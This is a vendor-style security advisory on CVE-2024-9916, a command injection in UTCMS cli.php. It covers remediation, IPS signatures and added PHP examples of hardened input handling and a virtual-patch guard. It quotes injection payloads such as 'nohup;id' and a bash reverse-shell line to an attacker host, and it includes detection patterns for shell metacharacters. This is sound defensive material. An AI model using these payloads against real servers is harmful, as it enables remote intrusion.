
Command Injection in HuangDou UTCMS (CVE-2024-9916) Enables RCE

by Security News

Overview

The SonicWall Capture Labs threat research team would like to highlight CVE-2024-9916, which remains unpatched and poses a risk to customer environments. Below is an analysis of the vulnerability itself, along with the mitigation measures available against exploits that may target it.

CVE-2024-9916 is an OS command injection (CWE-78) in HuangDou UTCMS V9 (also mapped via CPE to Usualtool UsualtoolCMS 9.0). The parameter "o" handled by app/modules/ut-cac/admin/cli.php is forwarded to an operating system shell without proper neutralization, so a remote, unauthenticated attacker can send a crafted HTTP request to cli.php and execute arbitrary commands with no user interaction. NVD rates the flaw 9.8 on the CVSS 3.1 scale, and EPSS estimates a 73.42% likelihood of exploitation within 30 days. Public exploit details are available, and coordination notes indicate the vendor did not respond. The CVE was published on October 13, 2024, and last modified on October 16, 2024.

Successful exploitation fully compromises the CMS host, enabling data exfiltration, content manipulation, lateral movement, and service disruption.

Until an official fix is available: restrict or remove access to cli.php, disable the ut-cac module, validate and sanitize server-side parameters, stop passing user input to a shell, enforce least privilege and network segmentation, and apply IPS signatures that detect and block malicious use of the o parameter. Continuous monitoring for anomalous child processes of the web server and for unexpected outbound connections is also recommended.

Technical Overview

The flaw is in the CAC module's admin script cli.php. The script reads the POST parameter 'o', replaces only a handful of characters in it, and then passes the resulting string to shell_exec() as long as it begins with one of the allowed prefixes (cd, php, nohup, or composer). Because there is no authentication gate in front of this file, and because shell metacharacters such as semicolons, backticks, and $() are not neutralized, remote attackers can execute arbitrary commands.

Figure 1: Vulnerable Code in cli.php

The vulnerability stems from an input validation approach that blocklists a few characters instead of properly sanitizing or, better, avoiding the shell altogether. On line 2 of Figure 1, the code attempts to filter the user-supplied `$_POST["o"]` parameter by removing URL-encoded ampersands (`%26`), pipes (`%7C`), and their literal equivalents (`&` and `|`). This filtering is trivially bypassed because it does not address other shell metacharacters such as semicolons (`;`), backticks (` ` `), command substitution (`$()`), or newlines. Line 3 implements a prefix-based allowlist check, accepting any string that begins with `cd`, `php`, `nohup`, or `composer` (a prefix match, so `nohupx` passes as readily as `nohup`). Once this check passes, line 4 executes the unsanitized input directly via `shell_exec($o)`, which hands the string to a system shell and returns the command output. An attacker exploits this by prefixing the payload with one of the allowed strings (most commonly `nohup`) and chaining arbitrary commands after it with a semicolon or another shell operator.

Figure 2: nohup string

Taken together, the missing authentication, the incomplete character filter, and the prefix-only allowlist amount to a design flaw in the CAC (Command Administration Console) module authored by HuangDou: remote attackers bypass the script's weak filtering and prefix check and achieve unauthenticated remote code execution.

Figure 3: Author of HuangDou
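The filter described above, reconstructed in PHP from this write-up's description and placed beside a hardened rewrite. This is an added example, not the vendor's cli.php and not the code shown in Figure 1; the function names and the program paths are assumptions. Neither function executes anything: the vulnerable one returns the string that would reach shell_exec(), the hardened one returns the argv array it would hand to proc_open(), so the bypass can be checked safely by saving the file and running it with `php`.

```php
<?php
// Added example reconstructed from the write-up, not the vendor's cli.php.
// Nothing here runs a command: each function returns what it *would* execute.
declare(strict_types=1);

const ALLOWED_PREFIXES = ['cd', 'php', 'nohup', 'composer'];

// Vulnerable pattern as described: strip four characters, test a prefix,
// and pass the remainder to shell_exec(). Returns that remainder, or null
// when the prefix check fails.
function vulnerable_command(array $post): ?string
{
    $o = (string)($post['o'] ?? '');
    $o = str_replace(['%26', '%7C', '&', '|'], '', $o);   // only & and | are removed
    foreach (ALLOWED_PREFIXES as $prefix) {
        if (strpos($o, $prefix) === 0) {                   // prefix, not whole word
            return $o;                                     // shell_exec($o) in the original
        }
    }
    return null;
}

// Hardened pattern: tight character set, exact-match allowlist of the
// program word mapped to a fixed path, no absolute or traversing arguments,
// and an argv array for proc_open($argv, ...) (PHP >= 7.4), which executes
// the program directly so no shell ever parses the input. 'cd' is dropped:
// it is a shell builtin, not a program.
function hardened_argv(array $post): ?array
{
    $o = trim((string)($post['o'] ?? ''));
    // Rejects ; ` $ ( ) | & < > quotes, newlines and anything else unusual.
    if ($o === '' || !preg_match('/^[A-Za-z0-9_.\/=:@ -]+$/D', $o)) {
        return null;
    }
    $argv = preg_split('/ +/', $o);
    static $programs = [                     // paths are assumptions for this example
        'nohup'    => '/usr/bin/nohup',
        'php'      => '/usr/bin/php',
        'composer' => '/usr/local/bin/composer',
    ];
    if (!isset($programs[$argv[0]])) {
        return null;
    }
    foreach (array_slice($argv, 1) as $arg) {
        if ($arg[0] === '/' || strpos($arg, '..') !== false) {
            return null;                     // keep arguments inside the app tree
        }
    }
    $argv[0] = $programs[$argv[0]];
    return $argv;
}

// Constructed payloads (not captured traffic) exercising both paths.
$payloads = [
    'composer install',        // legitimate use: accepted by both
    'nohup;id',                // ; survives the weak filter
    'nohup `id`',              // backticks survive the weak filter
    'nohup $(id)',             // $() survives the weak filter
    "nohup\nid",               // newline survives the weak filter
    'nohupx;id',               // prefix match accepts a non-word
    'php ../../etc/cron.d/x',  // clean charset but escapes the app tree
];
foreach ($payloads as $p) {
    printf("%-28s weak: %-6s hardened: %s\n",
        json_encode($p),
        vulnerable_command(['o' => $p]) === null ? 'reject' : 'SHELL',
        json_encode(hardened_argv(['o' => $p])));
}
```

In production the argv allowlist should be narrowed further to the exact invocations the module actually needs (specific scripts and options), since even a clean `php some/script.php` is only as safe as the script it names.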

Triggering the Vulnerability

Exploitation of CVE-2024-9916 requires the following conditions:

  • Affected versions: The vulnerable file /app/modules/ut-cac/admin/cli.php exists in UTCMS V9 (May 2023) and remains unchanged through V10.3.1 (October 2025), with no vendor patch released since the October 2024 disclosure.
  • Network access: An attacker must reach the unauthenticated endpoint via an HTTP POST to /app/modules/ut-cac/admin/cli.php over HTTP or HTTPS (ports 80/443) from the internet, a VPN, or internal networks.
  • PHP configuration: The server must be running PHP 5/7/8 with shell_exec() enabled (i.e., not disabled in php.ini), which is common in default installations.
  • Web server permissions: Exploited commands execute as the web server user (for example, www-data, apache, nginx), allowing reads of application files (including database credentials), writes to uploads/ and cache/, process spawning, persistence, and potential local privilege escalation.
  • Network-layer defenses: No effective WAF, IPS signatures, or reverse-proxy filters are blocking POST payloads that include shell metacharacters after allowed prefixes (for example, nohup, php, cd, composer).

Exploitation

The following video demonstrates a complete exploitation chain for CVE-2024-9916, starting with unauthenticated command injection via an HTTP POST to `/app/modules/ut-cac/admin/cli.php` and progressing to an interactive reverse shell on the vulnerable UTCMS V9 server. The demonstration shows how an attacker uses the `nohup` prefix bypass to execute a bash TCP redirect payload (`bash -i >& /dev/tcp/attacker_ip/4444 0>&1`), thereby obtaining interactive remote access with full command execution under the web server's privileges. This proof of concept confirms the critical severity (CVSS 9.8) of the vulnerability and the immediate risk to unpatched UTCMS installations.


SonicWall Protections

SonicWall Network Security appliances with active IPS subscriptions protect against exploits targeting this vulnerability with the following signature(s): 

  • IPS: 21617 “UTCMS ut-cac Command Injection”  

Remediation Recommendations

The risks posed by CVE-2024-9916 can be mitigated or eliminated by: 

Remove or secure the vulnerable endpoint: Delete or restrict access to app/modules/ut-cac/admin/cli.php or enforce authentication before any command execution. 

Implement proper input validation and sanitization: Match the whole command word against an exact allowlist rather than a prefix, reject any input containing shell metacharacters, and stop handing strings to a shell at all. In PHP, pass the program and its arguments as an array to proc_open() (supported since PHP 7.4), which executes the program directly without a shell, or at minimum escape every argument with escapeshellarg().

Apply the principle of least privilege: Run the web server and PHP worker processes with minimal permissions and disable risky PHP functions such as shell_exec(), exec(), and system() through the disable_functions directive in php.ini.

Utilize up-to-date IPS signatures: Detect and block POST requests to /app/modules/ut-cac/admin/cli.php containing suspicious command patterns in the o parameter. 

Implement network segmentation and continuous monitoring: Isolate the CMS in a restricted segment and monitor for anomalous processes or HTTP requests to the vulnerable endpoint. 
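A virtual patch for deployments that cannot remove the file yet, as an added example that is neither SonicWall's IPS signature logic nor the vendor's code: a guard loaded in front of every script through php.ini's auto_prepend_file directive, so the vendor tree stays untouched. It fences cli.php to an administrative source range and flags the request shape this write-up describes (an allowed prefix followed by shell metacharacters, or a prefix that is not a whole word). The CIDR list, the file path, the "utcms-guard" log tag, and the detection patterns are assumptions; the inspection function is pure so it can also be run offline over captured requests, which the CLI branch does with constructed samples.

```php
<?php
// Added example, not the vendor's code or SonicWall's signature: a virtual
// patch for the unpatched endpoint. Install with, in php.ini,
//   auto_prepend_file = /etc/php/utcms-guard.php   (path is an assumption)
// so it runs before cli.php (or any other script) handles the request.
declare(strict_types=1);

const GUARDED_SUFFIX = '/app/modules/ut-cac/admin/cli.php';
const ADMIN_CIDRS    = ['10.0.0.0/8', '127.0.0.1/32'];   // assumption: where admins come from

// IPv4-only CIDR match; anything unparsable is treated as untrusted.
function ip_in_cidr(string $ip, string $cidr): bool
{
    [$net, $bits] = array_pad(explode('/', $cidr, 2), 2, '32');
    $ipl  = ip2long($ip);
    $netl = ip2long($net);
    if ($ipl === false || $netl === false) {
        return false;
    }
    $bits = (int)$bits;
    $mask = $bits === 0 ? 0 : ((-1 << (32 - $bits)) & 0xFFFFFFFF);
    return ($ipl & $mask) === ($netl & $mask);
}

// Decide on one request. Returns [verdict, reason]. Pure: no globals, no I/O.
function inspect_request(string $method, string $uri, string $body, string $client): array
{
    $path = parse_url($uri, PHP_URL_PATH);
    if (!is_string($path) || substr($path, -strlen(GUARDED_SUFFIX)) !== GUARDED_SUFFIX) {
        return ['allow', 'not the guarded endpoint'];
    }
    $trusted = false;
    foreach (ADMIN_CIDRS as $cidr) {
        $trusted = $trusted || ip_in_cidr($client, $cidr);
    }
    if (!$trusted) {
        return ['block', "cli.php reached from untrusted client $client"];
    }
    if (strtoupper($method) !== 'POST') {
        return ['block', 'cli.php only takes POST; ' . $method . ' refused'];
    }
    parse_str($body, $params);
    $o = is_string($params['o'] ?? null) ? $params['o'] : '';
    // cli.php strips only & and |; flag every other operator a shell honours.
    if (preg_match('/[;`$|&<>\r\n]/', $o)) {
        return ['block', 'shell metacharacter in o: ' . json_encode($o)];
    }
    // Its check is a prefix match, so insist on a whole allowed word.
    if (!preg_match('/^(?:cd|php|nohup|composer)(?: |$)/', $o)) {
        return ['block', 'o does not begin with an allowed word: ' . json_encode($o)];
    }
    return ['allow', 'trusted client, clean command'];
}

// Live path: consult the verdict for the current request and stop early.
function install_guard(): void
{
    [$verdict, $why] = inspect_request(
        $_SERVER['REQUEST_METHOD'] ?? 'GET',
        $_SERVER['REQUEST_URI'] ?? '/',
        (string)file_get_contents('php://input'),   // urlencoded bodies are readable here
        $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'
    );
    if ($verdict === 'block') {
        error_log('utcms-guard: ' . $why);          // forward this line to the SIEM
        http_response_code(403);
        exit;
    }
}

if (PHP_SAPI === 'cli') {
    // Offline check over constructed requests (not captured traffic).
    $samples = [
        ['POST', '/app/modules/ut-cac/admin/cli.php', 'o=composer+install', '10.1.2.3'],
        ['POST', '/app/modules/ut-cac/admin/cli.php', 'o=nohup%3Bid',       '10.1.2.3'],
        ['POST', '/app/modules/ut-cac/admin/cli.php', 'o=nohup+%60id%60',   '10.1.2.3'],
        ['POST', '/app/modules/ut-cac/admin/cli.php', 'o=nohupx+id',        '10.1.2.3'],
        ['POST', '/utcms/app/modules/ut-cac/admin/cli.php', 'o=composer+install', '203.0.113.9'],
        ['GET',  '/index.php?m=home', '', '203.0.113.9'],
    ];
    foreach ($samples as $s) {
        [$v, $why] = inspect_request(...$s);
        printf("%-5s %-4s %-45s %s\n", $v, $s[0], $s[1], $why);
    }
} else {
    install_guard();
}
```

The guard reads the raw body rather than `$_POST` so the same function can be pointed at captured request bodies; if the web server uses a reverse proxy, replace `REMOTE_ADDR` with the proxy-validated client address or the source check will see only the proxy. Blocking the endpoint outright (no trusted range at all) is the stronger option where the module is not in use, as the recommendations above note.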

Relevant Links

GitHub Security Advisory

National Vulnerability Database (NVD) Entry

CWE-78: OS Command Injection

CVSS v3.1 Calculator

EPSS Score History
